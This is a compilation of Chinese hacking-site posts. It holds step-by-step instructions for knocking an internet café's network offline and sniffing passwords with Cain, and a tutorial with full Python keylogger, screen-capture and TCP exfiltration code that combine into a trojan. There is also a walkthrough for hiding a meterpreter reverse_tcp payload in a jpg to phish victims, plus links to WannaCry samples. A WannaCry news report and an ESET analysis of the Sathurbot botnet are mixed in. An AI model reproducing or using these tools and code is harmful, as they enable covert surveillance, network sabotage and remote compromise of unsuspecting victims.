蜗牛攻击器输入攻击目标主机:192.168.xxx.xxx
增加蜗牛
切记不要使自己的机器卡死,增加4到5个都可以,模式自己搞。
p2p网络终结者全局控制,黑名单。起到了一定的arp的效果。但不是欺骗。
cain去嗅探主机的账户密码。【这一步不会的话可以使用上面几步】


第五步:等7到8分钟整个网吧会掉线,这里的cain其实没有起到多大的作用,说这个是为了网大家去嗅探一些简单的局域网密码算是一种爆破工具吧~内网扫描工具等。


如果网吧不掉线:两台机器同时攻击.直接秒死…经过测试所有网吧都可以进行秒杀,因为网吧的安全问题和带宽的响应问题..导致网吧直接秒死是正常的………..之前去了网吧做测试..所以没有敢拍照和录像..有机会一定弄,不会的关注我们官方公众微信,进行留言,我们会有专门的客服教你喔~~~

中国骇客云教你使用Python编写木马程序

这次我们运用Python编写一个具有键盘记载、截屏以及通讯功用的简易木马,仍然选用Sublimetext2+JEDI(python自动补全插件)来写代码。首先准备好我们需求的依赖库,pythonhook和pythoncom。

假如觉得费事,你能够直接运用集成了一切我们所需求的python库的商业版Activepython。记载你所敲打的一切:编写一个keylogger说起Keylogger,大家的思想可能早已飞向带有wifi功用的mini小硬件去了。抛开高科技,我们暂且回归实质,探探简易键盘记载器的原理与完成。Pythonkeylogger键盘记载的功用的完成主要应用了pythoncom及pythonhook,然后就是对windowsAPI的各种调用。Python之所以用起来便当快捷,主要归功于这些庞大的支持库,正所谓“人生苦短,快用Python”。关键代码如下所示:

#-*-coding:utf-8-*-fromctypesimport*importpythoncomimportpyHookimportwin32clipboarduser32=windll.user32kernel32=windll.kernel32psapi=windll.psapicurrent_window=None#defget_current_process():#获取最上层的窗口句柄hwnd=user32.GetForegroundWindow()#获取进程IDpid=c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))#将进程ID存入变量中process_id="%d"%pid.value#申请内存executable=create_string_buffer("\x00"*512)h_process=kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#读取窗口标题windows_title=create_string_buffer("\x00"*512)length=user32.GetWindowTextA(hwnd,byref(windows_title),512)#打印printprint"[PID:%s-%s-%s]"%(process_id,executable.value,windows_title.value)print#关闭handleskernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)#定义击键监听事情函数defKeyStroke(event):globalcurrent_window#检测目的窗口能否转移(换了其他窗口就监听新的窗口)ifevent.WindowName!=current_window:current_window=event.WindowName#函数调用get_current_process()#检测击键能否常规按键(非组合键等)ifevent.Ascii>32andevent.Ascii<127:printchr(event.Ascii),else:#假如发现Ctrl+v(粘贴)事情,就把粘贴板内容记载下来ifevent.Key=="V":win32clipboard.OpenClipboard()pasted_value=win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print"[PASTE]-%s"%(pasted_value),else:print"[%s]"%event.Key,#循环监听下一个击键事情returnTrue#创立并注册hook管理器kl=pyHook.HookManager()kl.KeyDown=KeyStroke#注册hook并执行kl.HookKeyboard()pythoncom.PumpMessages()

【学问点】钩子(Hook):Windows音讯处置机制的一个平台,应用程序能够在上面设置子程以监视指定窗口的某种音讯,而且所监视的窗口能够是其他进程所创立的。编写代码时一定要留意严厉辨别大小写,检查无误后启动keylogger,然后能够尝试翻开记事本写点东西,过程中能够看到我们的keylogger窗口正在对我们的输入实时记载,如图1所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631280829472.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图1

切换窗口时会自动跟踪到新窗口,light教授趁机骚扰一下疯狗,能够看到我们的keylogger曾经跟踪到QQ聊天窗口,并忠实的记载下输入的一切,如图2所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631289746044.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图2

看看你在干什么:编写一个screenshotter截屏完成起来更简单,直接调用几个GUI相关的API即可,我们直接看代码。

#-*-coding:utf-8-*-importwin32guiimportwin32uiimportwin32conimportwin32api#获取桌面hdesktop=win32gui.GetDesktopWindow()#分辨率顺应width=win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)height=win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)left=win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)top=win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)#创立设备描绘表desktop_dc=win32gui.GetWindowDC(hdesktop)img_dc=win32ui.CreateDCFromHandle(desktop_dc)#创立一个内存设备描绘表mem_dc=img_dc.CreateCompatibleDC()#创立位图对象screenshot=win32ui.CreateBitmap()screenshot.CreateCompatibleBitmap(img_dc,width,height)mem_dc.SelectObject(screenshot)#截图至内存设备描绘表mem_dc.BitBlt((0,0),(width,height),img_dc,(left,top),win32con.SRCCOPY)#将截图保管到文件中screenshot.SaveBitmapFile(mem_dc,'c:\\WINDOWS\\Temp\\screenshot.bmp')#内存释放mem_dc.DeleteDC()win32gui.DeleteObject(screenshot.GetHandle())

运转之后看看效果如何,如图3所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631310619179.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图3

综合运用:完成一个简易木马

无论是keylogger记载下的内容,还是screenshotter截获的图片,只存在客户端是没有太大意义的,我们需求构建一个简单server和client端来停止通讯,传输记载下的内容到我们的效劳器上。

1)编写一个简单的TCPclient

#-*-coding:utf-8-*-importsocket#目的地址IP/URL及端口target_host="127.0.0.1"target_port=9999#创立一个socket对象client=socket.socket(socket.AF_INET,socket.SOCK_STREAM)#衔接主机client.connect((target_host,target_port))#发送数据client.send("GET/HTTP/1.1\r\nHOST:127.0.0.1\r\n\r\n")#接纳响应response=client.recv(4096)printresponse

2)编写一个简单的TCPserver

#-*-coding:utf-8-*-importsocketimportthreading#监听的IP及端口bind_ip="127.0.0.1"bind_port=9999server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)server.bind((bind_ip,bind_port))server.listen(5)print"[*]Listeningon%s:%d"%(bind_ip,bind_port)defhandle_client(client_socket):request=client_socket.recv(1024)print"[*]Received:%s"%requestclient_socket.send("ok!")client_socket.close()whileTrue:client,addr=server.accept()print"[*]Acceptconnectionfrom:%s:%d"%(addr[0],addr[1])client_handler=threading.Thread(target=handle_client,args=(client,))client_handler.start()

开启效劳端监听,如图4所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631323537986.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631335392821.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

执行客户端,如图5所示。

效劳端接纳到客户端的恳求并做出了响应,如图6所示。

<mip-img src=”http://www.weixianmanbu.com/zb_users/upload/2016/07/201607041467631342512153.png” class=”mip-element mip-layout-container mip-img-loaded” style=”margin: 0px; padding: 0px; box-sizing: border-box; display: block; width: 748px; position: relative;”>

图6更多关注www.hackerschina.org

最后需求做的就是把上面三个模块分离起来,一个简易的具有键盘记载、屏幕截图并能够发送内容到我们效劳端的木马就完成了。能够运用py2exe把脚本生成exe可执行文件。当然,你还能够继续发挥,加上远程控制功用。

WannaCry ransomware hit Windows computers worldwide HACKERSCHINA NEWS 4黑色星期五:大规模的勒索攻击以打击全球系统的想哭计算机病毒,“勒索者永恒之蓝”

一个巨大的恶意勒索攻击星期五的头条,首先针对英国医院和西班牙银行在世界范围内迅速蔓延。这个消息是由西班牙电信公司Telefónicaó及时确认,其中的勒索攻击的众多受害者。报纸El Pais报道大量的攻击而在西班牙,ó电信专家确认在其内部的系统已经被病毒感染,增加的情况下的控制。固定和移动电话服务的电话óNICA不被攻击勒索的影响。

西班牙CERT发出一种警告的组织和确认的恶意软件正在迅速蔓延。

《勒索、巴克什想哭(aka Wcry,WanaCrypt,wannacrypt),有针对性的其他许多公司在西班牙和世界各地,包括沃达丰,联邦,和其他关键基础设施。

El Reg报道6 NHS健康信托在英国被恶意软件了。根据Theresa May总理“勒索”削弱了“英国医院、政府代表也证实,情况是由情报机构GCHQ的监控。

NHS面临由于其IT基础设施的陈旧性,还包括大量的运行Windows XP系统的严重问题。

“电脑被锁在Aintree、布莱克浦、埃塞克斯郡布鲁姆菲尔德医院,科尔切斯特总医院,在Derbyshire,大雅茅斯所有的医院系统,东、北赫特福德郡,James Paget Hospital在Norfolk,Lanarkshire,和莱斯特。”报道,埃尔条。

图1–计算机的勒索软件感染想哭

专家从Avast检测安全公司更多超过75000的攻击在99个国家中,大多数的感染的观察在俄罗斯,乌克兰,台湾。

一个实时地图的感染可在以下地址:

https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

图2–实时感染地图

来源ArsTechnica

一个勒索,利用国家安全局eternalblue和doublepulsar战功

想哭的勒索,利用两NSA利用eternalbluedoublepulsar感染计算机和传播到任何另一个连接Windows系统的威胁,在同一个网络。

从卡巴斯基实验室的研究人员已经证实,想哭”攻击是通过一个smbv2远程执行代码在微软Windows启动。

“重要的是要明白,而未打补丁的Windows计算机暴露他们的SMB服务可以远程攻击的“eternalblue”开发的勒索软件感染的想哭,这个漏洞也存在不足不能防止勒索软件组件的工作。不过,这个漏洞的存在是引起爆发的最重要因素,”卡巴斯基的分析报告

专家强调,网络温暖的能力,允许恶意代码传播迅速。

“这项运动的特殊性是通过利用漏洞公告ms17-010使用描述引起的eternalblue/doublepulsar,可感染其他连接的Windows系统上是不正确的更新相同的网络。一台计算机感染最终会影响整个企业的网络。”国家的西班牙语证书发出安全警报

“勒索,想哭的一个变种,感染机通过加密所有文件,使用前一段允许执行远程命令通过Samba提到的漏洞(SMB),在相同的网络分布到其他Windows机器。”

的doublepulsar后门,允许攻击者注入并执行在目标系统上安装恶意代码;它是利用eternalblue,一个smbv1(服务器消息块1)开发这可能导致在旧版本的Windows的RCE(Windows XP Server 2008 R2)。

想哭的勒索利差通过SMB,它加密的文件在被感染的机器和收费300美元或600美元的比特币恢复。

勒索软件可以加密各种文件在受感染的机器,它也攻击存储在任何附加存储的文件,并把远程桌面访问任何键。恶意软件删除卷快照和禁用修复工具系统将不可能恢复文件。

专家观察恶意软件确定受害者的语言在正确的语言显示赎金要求

在思科塔洛斯团队安全专家已经在想哭勒索公布详细的分析。

在分析出版的专家在该研究小组描述了完整的感染过程如下:

“初始文件和执行文件tasksche.exe mssecsvc.exe滴。杀死开关领域进行检查。其次,服务mssecsvc2.0创建。该服务执行文件mssecsvc.exe比初始执行不同的切入点。本次执法检查被感染的机器,并试图连接到同一子网中的每个IP地址的445端口的TCP IP地址。当恶意软件成功地连接到机器上,启动连接和数据传输。我们相信这是一个利用网络流量负载。它已被广泛报道这是利用最近披露的解决微软在公告的漏洞ms17 – 010。我们目前没有一个完整的理解的SMB流量,到底需要什么条件是它使用这种方法传播。”状态的分析。

“磁盘驱动器上的文件tasksche.exe检查,包括网络共享和移动存储设备映射到一个字母,如“C:”,“/”D:等恶意软件然后检查一个文件扩展名为附录中所列的文件加密使用2048位RSA加密。当文件被加密,恶意软件创建一个新文件目录“Tor”到它下降的tor.exe九DLL文件使用的tor.exe。此外,它滴两个文件:taskdl.exe和taskse.exe。前者删除临时文件,后者推出“wanadecryptor @。exe桌面上向最终用户显示的赎金。“wanadecryptor @ .exe的本身并不是勒索赎金,只。加密是通过tasksche在后台进行。exe”。

专家分析,希望能找到想哭勒索样品在GitHub库:

https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

该页包含有用的信息,如恶意软件的比特币钱包地址。

勒索指导受害者到一个页面,在btcfrog显示一个QR码,它链接到攻击者的主要的比特币钱包13am4vw2dhxygxeqepohkhsquy6ngaeb94

图3–支付页面显示的QR码

下面的威胁的关键发现:

  • 病毒名称:wannacrypt,想哭,wanacrypt0r,WCrypt,wcry
  • 矢量:如果不打补丁ms-17-010所有Windows版本的Windows 10之前是脆弱的。它采用eternalblue ms17-010传播。
  • 赎金:300美元到600美元之间。有码RM(删除)在病毒文件。似乎复位如果病毒崩溃。
  • 留后门:蠕虫的循环通过系统上的每个RDP会话运行勒索用户。它还安装了doublepulsar后门。它被阴影使回收难。(来源:Malwarebytes)
  • 杀死开关:如果网站www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com是病毒的存在而感染宿主。(来源:Malwarebytes)。这一领域已sinkholed,阻止蠕虫的传播。

解密样品的想哭勒索是可用的在这里

HTTPS:/ / / / cyber1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.exe zhnxr transfer.sh

杀死开关

在大规模攻击的安全专家开始他们的恶意代码分析的野外恶意软件样本的逆向工程几小时后。好消息是,从第一次调查的恶意软件研究人员已经发现了一种杀死开关的勒索软件代码,条件可以阻止代码的执行,当匹配。

道德黑客培训–资源(信息安全)

图4–Kevin Beaumont Tweet杀死开关

英国专家malwaretechblog已经注册了域名后,他们做了一个代码的逆向工程。

杀死开关领域iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com;域名sinkholed执法。在加利福尼亚的一个服务器,和管理员的受感染的系统达到了.com将会收到通知,告诉我们。“从我们的天坑的IP地址已被送往联邦调查局。

图5–杀死开关领域

下面显示当机器试图连接它的消息:

“从我们的天坑的IP地址已被送往联邦调查局和Shadowserver因此受影响的组织应该很快就会得到一个通知,”研究者。信息安全体承认他们注册了域名,然后意识到这是一个总开关。不过,工作了。”

从思科战专家的想哭勒索一个有趣的分析。

“想哭似乎并不只是利用这种攻击框架相关的eternalblue模块;它仅仅是对doublepulsar存在后门扫描服务器。在情况下,它标识一个主机,已经与这个后门植入,它只是利用现有的后门功能,用它来感染系统的想哭”读分析来自Talos。“如果系统尚未被植入doublepulsar,恶意软件将使用eternalblue的SMB漏洞的初步开发。这是蠕虫样活性,已被广泛观察到整个互联网的原因。”

微软已经发布了一个安全顾问对威胁和急救补丁WindowsXP

IT巨头发布急救安全补丁的Windows Server 2003(SP2 x64和x86);Windows XP(SP2 SP3 x64,x86);Windows XP Embedded(SP3,x86);以及Windows 8位和64位版本。

结论

以下几个方面对大规模的勒索攻击必须仔细考虑:

  • 这种攻击演示相关的风险militarization的网络空间。恶意软件,利用代码和黑客工具的情报机构和政府发展是很危险的,失去控制。
  • 该恶意软件的成功是由于那些没有意识到威胁的受害者错误的安全态势,并没有应用安全补丁,微软发布的。
  • 现代的关键基础设施的网络攻击是没有弹性的。
  • WannaCry ransomware hit Windows computers worldwide

    A massive malicious ransomware-based attack made the headlines on Friday, first targeting UK hospitals and Spanish banks before rapidly spreading worldwide. The news was promptly confirmed by the Spanish Telco companies Telefónica, one of the numerous victims of the ransomware attack. The newspaper El Pais also reportedthe massive attack, while experts at Telefónicaconfirmedthe systems in its intranet had been infected, adding that the situation was under control. The fixed and mobile telephone services provided by Telefónica were not been affected by the ransomware-based attack.

    The Spanish CERT issued an alert warning the organizations and confirmed that the malware was rapidly spreading.

    The ransomware, dubbedWannaCry(aka Wcry, WanaCrypt, WannaCrypt), targeted many other companies in Spain and across the world, including Vodafone, FedEx, and other critical infrastructure.

    El Reg reported that 6 NHS health trusts in the UK were taken out by the malware. According to Prime Minister Theresa May, the ransomware “has crippled” UK hospitals, the Government representative also confirmed that the situation was monitored by the intelligence agency GCHQ.

    The NHS faced serious problems due to the antiquated nature of its IT infrastructure that still includes a large number of systems running Windows XP systems.

    “Computers were locked in Aintree, Blackpool, Broomfield Hospital in Essex, Colchester General Hospital, all hospital systems in Derbyshire, Great Yarmouth, East and North Hertfordshire, James Paget Hospital in Norfolk, Lanarkshire, and Leicester.” Reported El Reg.

    Figure 1 – A computer infected by the WannaCry ransomware

    Experts from the security firm Avast detected morethan 75,000 attacksin 99 countries, most of the infections were observed in Russia, Ukraine, and Taiwan.

    A real-time map of the infections is available at the following address:

    https://intel.malwaretech.com/botnet/wcrypt/?t=5m&bid=all

    Figure 2 – Real Time Infections Map

    SourceArstechnica

    A Ransomware that leverages the NSA EternalBlue and DoublePulsar exploits

    The WannaCry ransomware exploits the two NSA exploitsEternalBlueandDoublePulsarto infect computers and propagate the threat to any another connected Windows systems on the same network.

    Researchers from Kaspersky Lab have confirmed that the WannaCry” attack is initiated through an SMBv2 remote code execution in Microsoft Windows.

    “It is important to understand that while unpatched Windows computers exposing their SMB services can be remotely attacked with the “EternalBlue” exploit and infected by the WannaCry ransomware, the lack of existence of this vulnerability doesn’t really prevent the ransomware component from working. Nevertheless, the presence of this vulnerability appears to be the most significant factor that caused the outbreak,” reported the analysis from Kaspersky

    Experts highlighted the network warm capabilities that allow the malicious code to spread rapidly.

    “The special criticality of this campaign is caused by exploiting the vulnerability described in bulletin MS17-010 usingEternalBlue/DoublePulsar, which can infect other connected Windows systems on the same network that are not properly updated. Infection of a single computer can end up compromising the entire corporate network.” states the security alert issued by the Spanish CERT.

    “The ransomware, a variant of WannaCry, infects the machine by encrypting all its files and, using the vulnerability mentioned in the previous paragraph that allows the execution of remote commands through Samba (SMB) and is distributed to other Windows machines in That same network.”

    The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system; it is installed by leveraging theETERNALBLUE, an SMBv1 (Server Message Block 1.0)exploitthat could trigger an RCE in older versions of Windows (Windows XP to Server 2008 R2).

    The WannaCry ransomware spreads via SMB, it encrypts the files on the infected machines and charges $300 or $600 in Bitcoin to restore them.

    The ransomware can encrypt a wide variety of documents on the infected machines, it also attacks documents stored on any attached storage, and snatches any keys for remote desktop access. The malware deletes volume snapshots and disables system repair tools to make impossible recovery files.

    Experts observed the malware determine the victim’s language to display a ransom demand in the correct language

    Security experts at CISCO Talos team have published a detailed analysis on the WannaCry ransomware.

    Below the complete infection process described in the analysis published by the experts at the Talos team:

    “An initial file mssecsvc.exe drops and executes the file tasksche.exe. The kill switch domain is then checked. Next, the service mssecsvc2.0 is created. This service executes the file mssecsvc.exe with a different entry point than the initial execution. This second execution checks the IP address of the infected machine and attempts to connect to port 445 TCP of each IP address in the same subnet. When the malware successfully connects to a machine, a connection is initiated, and data is transferred. We believe this network traffic is an exploit payload. It has been widelyreportedthis is exploiting recently disclosed vulnerabilities addressed by Microsoft in bulletinMS17-010. We currently don’t have a complete understanding of the SMB traffic, and exactly what conditions need to be present for it to spread using this method.” states the analysis.

    “The file tasksche.exe checks for disk drives, including network shares and removable storage devices mapped to a letter, such as ‘C:/’, ‘D:/’ etc. The malware then checks for files with a file extension as listed in the appendix and encrypts these using 2048-bit RSA encryption. While the files are being encrypted, the malware creates a new file directory ‘Tor/’ into which it drops tor.exe and nine dll files used by tor.exe. Additionally, it drops two further files: taskdl.exe & taskse.exe. The former deletes temporary files while the latter launches @wanadecryptor@.exe to display the ransom note on the desktop to the end user. The @wanadecryptor@.exe is not in and of itself the ransomware, only the ransom note. The encryption is performed in the background by tasksche.exe.”

    Experts that want to analyze the WannaCry ransomware can findsampleson the following GitHub repository:

    https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168

    the page includes useful information such as the addresses of Bitcoin wallets for the malware.

    The ransomwaredirectsvictims to a page with displaying a QR code at btcfrog, which links to attacker main bitcoin wallet13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94.

    Figure 3 – Payment Page displays QR code

    Below Key findings of the threat:

    • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
    • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
    • Ransom: between $300 to $600. There is code to ‘rm’ (delete) files in the virus. Seems to reset if the virus crashes.
    • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: Malwarebytes)
    • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: Malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

    A decrypted sample of the WannaCry ransomware is availablehere:

    https://transfer.sh/ZhnxR/CYBER1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830.EXE

    The Kill Switch

    A few hours after the massive attacks security experts started their analysis of the malicious code after a reverse engineering of the samples of the malware available in the wild. The good news emerged from the first investigation is that malware researchers have discovered a kill switch in the ransomware code, a condition that could halt the execution of the code when matched.

    ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)

    Figure 4 – Kevin Beaumont Tweet about the kill switch

    The UK experts atMalwareTechBloghave registered the domain after they made a reverse engineering of the code.

    The Kill Switch domain is iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com; the domain was sinkholed by law enforcement. To a server in California, and the admins of the infected systems reaching out to the dot-com will be notified, we are told. “IP addresses from our sinkhole have been sent to FBI.

    Figure 5 – Kill Switch domain

    Below the messages displayed when a machine tries to connect it:

    “IP addresses from our sinkhole have been sent to FBI andShadowServerso affected organizations should get a notification soon,”saidthe researcher. The InfoSec bodyadmittedthey registered the domain first, then realized it was a kill switch. Still, job done.”

    Experts from CISCO Talos group made an interesting analysis of the WannaCry ransomware.

    “WannaCry does not appear to only be leveraging the ETERNALBLUE modules associated with this attack framework; it is simply scanning accessible servers for the presence of the DOUBLEPULSAR backdoor. In cases where it identifies a host that has been implanted with this backdoor, it simply leverages the existing backdoor functionality available and uses it to infect the system with WannaCry.” reads theanalysisfrom Talos. ” In cases where the system has not been previously compromised and implanted with DOUBLEPULSAR, the malware will use ETERNALBLUE for the initial exploitation of the SMB vulnerability. This is the cause of the worm-like activity that has been widely observed across the internet.”

    Microsoft has published asecurity advisoryfor the threat and an emergency patch forWindows XP.

    The IT giant released emergency security patches for Windows Server 2003 (SP2 x64 / x86); Windows XP (SP2 x64, SP3 x86); Windows XP Embedded (SP3, x86); as well as the 32-bit and 64-bit versions of Windows 8.

    Conclusions

    The following aspects of the massive ransomware attack must be carefully considered:

    • This attack demonstrates the risks related to themilitarization of the cyberspace. Malware, exploits code and hacking tools developed by intelligence agencies and governments could be very dangerous when out of control.
    • The success of the malware is due to the wrong security posture of the victims that have no awareness of the threat, and that did not apply security patches released by Microsoft.
    • Modern critical infrastructure is not resilient to cyber-attacks

中国骇客云之图片后门捆绑利用工具FakeImageExploiter?Embedded Backdoor with Image using FakeImageExploiter

backdoor.jpg
在这里,要向大家推荐一款名为“Fake Image Exploiter”的安全工具,该工具可以在图片文件中捆绑隐藏的恶意.bat或.exe程序,方便钓鱼或社工攻击测试过程中的入侵控制。如果受害者点击该恶意图片文件后,将会向控制主机反弹一个管理控制会话。以下是其使用视频:

https://www.youtube.com/watch?v=4dEYIO-xBHU

In this article we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it.

Let’s start!

Open the terminal inside your kali Linux and type following command to download it from github.

Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.

Now made some changes inside setting file as shown the screenshot:

Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO and scroll down for next configration.

In same way set these two values also as shown in screenshot then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making certain changes in setting file then open the terminal and run the program file:

Cd FakeImageExploiter

./ FakeImageExploiter.sh

Click on YES to execute framework.

Select payload to build as I had choose window/meterpreter/reverse_tcp for attack.

After then a pop up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.

Now select icon for your malicious image.

Give a name to your payload which will be display to victim as file name, from screenshot you can see I had given sales.

Now it generates a link as you can observe it from highlighted part of screenshot and then send this link to victim. Now victim will download the zip file and click on the sales.jpg.

When victim will click on sales.jpg, we will get meterpreter session at the background on metasploit framework.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

配置使用

首先,打开Kali终端,执行下载安装和配置:

git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

1 (1).png

下载完成之后,进入FakeImageExploiter文件夹,选择setting文件进行配置:

2.png

在此,你可以选择隐藏在图片中的Payload格式,有ps1、bat、txt和exe四种格式可选,我们选择PAYLOAD_EXETNSION=bat;在生成捆绑图片文件的替换图标icon选项中,我们选择BYPASS_RH=NO,非自动,需要手动更改和添加最终生成的图片图标icon。

3.png

同样,在setting文件中找到以下两列进行按需修改:

AUTO_PAYLOAD_BUILD=YES (自动生成Payload选项)

AGENT_HANLER_PORT=4444(植入恶意程序后的客户端监听端口)

4.png

配置选项完成后,可以启动Fake Image Exploiter主程序。

生成Payload

Cd FakeImageExploiter

./ FakeImageExploiter.sh

5.png

选择YES启动Payload生成配置框架:

6.png

选择在捆绑在图片文件中的恶意程序需要加载利用的Payload,这里我们选择window/meterpreter/reverse_tcp:

7.png

之后,会跳出提示框,需要手动选择你需要捆绑.bat Payload进行伪装利用的jpg图片文件:

8.png

以及最终图片文件的替换图标icon主题:

9.png

接下来,为最终捆绑好的恶意图片文件进行命名:

10.png

FakeImageExploiter最后会生成在两个位置生成恶意图片文件,一个为本机Apache2 web服务的根目录下的.zip文件,另外为FakeImageExploiter输出文件夹(output)下的隐藏后缀恶意图片文件,点击执行后,该文件在显示jpg图像的同时,还会隐秘生成一个连向控制主机的反弹管理会话:

11.png

以下是控制端成功连接后显示的反弹管理会话:

12.png

好了,工具介绍完了,但请别用于非法目的哦。

 

“永恒之蓝”勒索病毒样本下载,WannaCry(永恒之蓝)的电脑勒索病毒及其变种下载,中国骇客云平台!

网上收集整理了已有的样本MD5,如果中国地区不能正常的下载到此病毒样本可以进行翻墙或者是进行vpn代理下载即可,下载地址:
继续阅读““永恒之蓝”勒索病毒样本下载,WannaCry(永恒之蓝)的电脑勒索病毒及其变种下载,中国骇客云平台!”

Sathurbot: Distributed WordPress password attack HackersChina分布式WordPress密码攻击

This article sheds light on the current ecosystem of the Sathurbot backdoor trojan, in particular exposing its use of torrents as a delivery medium and its distributed brute-forcing of weak WordPress administrator accounts.

The torrent leecher

Looking to download a movie or software without paying for it? There might be associated risks. It just might happen that your favorite search engine returns links to torrents on sites that normally have nothing to do with file sharing. They may, however, run WordPress and have simply been compromised.

Some examples of search results:

Clicking on some of those links returns the pages below (notice how some even use HTTPS):

The movie subpages all lead to the same torrent file; while all the software subpages lead to another torrent file. When you begin torrenting in your favorite torrent client, you will find the file is well-seeded and thus appears legitimate. If you download the movie torrent, its content will be a file with a video extension accompanied by an apparent codec pack installer, and an explanatory text file. The software torrent contains an apparent installer executable and a small text file. The objective of both is to entice get the victim to run the executable which loads the Sathurbot DLL.

After you start the executable, you are presented with a message like this:

While you ponder your options, bad things start to happen in the background. You have just become a bot in the Sathurbot network.

Backdoor and downloader

On startup, Sathurbot retrieves its C&C with a query to DNS. The response comes as a DNS TXT record. Its hex string value is decrypted and used as the C&C domain name for status reporting, task retrieval and to get links to other malware downloads.

Sathurbot can update itself and download and start other executables. We have seen variations ofBoaxxe, Kovter and Fleercivet, but that is not necessarily an exhaustive list.

The Sathurbot then reports its successful installation along with a listening port to the C&C. Periodically, it reports to the C&C that it is alive and well, waiting for additional tasks.

Web crawler

Sathurbot comes with some 5,000 plus basic generic words. These are randomly combined to form a 2-4 word phrase combination used as a query string via the Google, Bing and Yandex search engines.

From the webpages at each of those search result URLs, a random 2-4 word long text chunk is selected (this time it might be more meaningful as it is from real text) and used for the next round of search queries.

Finally, the second set of search results (up to first three pages) are harvested for domain names.

The extracted domain names are all subsequently probed for being created by the WordPress framework. The trick here is to check the response for the URL http://[domain_name]/wp-login.php.

Afterward the root index page of the domain is fetched and probed for the presence of other frameworks. Namely, they are also interested in: Drupal, Joomla, PHP-NUKE, phpFox, and DedeCMS.

Upon startup, or at certain time intervals, the harvested domains are sent to the C&C (a different domain is used than the one for the backdoor – a hardcoded one).

Distributed WordPress password attack

The client is now ready to get a list of domain access credentials (formatted aslogin:password@domain) to probe for passwords. Different bots in Sathurbot’s botnet try different login credentials for the same site. Every bot only attempts a single login per site and moves on. This design helps ensure that the bot doesn’t get its IP address blacklisted from any targeted site and can revisit it in the future.

During our testing, lists of 10,000 items to probe were returned by the C&C.

For the attack itself, the XML-RPC API of WordPress is used. Particularly the wp.getUsersBlogsAPI is abused. A typical request looks like:

The sequence of probing a number of domain credentials is illustrated in the following figure:

The response is evaluated and results posted to the C&C.

Torrent client – seeder

The bot has the libtorrent library integrated and one of the tasks is to become a seeder – a binary file is downloaded, torrent created and seeded.

The BitTorrent bootstrap

That completes the cycle from a leecher to an involuntary seeder:

Note: Not every bot in the network is performing all the functions, some are just web crawlers, some just attack the XML-RPC API, and some do both. Also, not every bot seems to be seeding a torrent.

Impact

The above-mentioned attempts on /wp-login.php from a multitude of users, even to websites that do not host WordPress, is the direct impact of Sathurbot. Many web admins observe this and wonder why it is happening. In addition, WordPress sites can see the potential attacks onwp.getUsersBlogs in their logs.

Through examination of logs, system artifacts and files, the botnet consists of over 20,000 infected computers and has been active since at least June 2016.

Occasionally, we have seen torrent links being sent by email as well.

Detection

Web Admins – Check for unknown subpages and/or directories on the server. If they contain any references to torrent download offers, check logs for attacks and possible backdoors.

Users – Run Wireshark with the filter http.request with no web browser open to see too many requests like GET /wp-login.php and/or POST /xmlrpc.php. Alternatively, check for files or registry entries listed in the IoC section, below.

ESET users are protected from this threat on multiple levels.

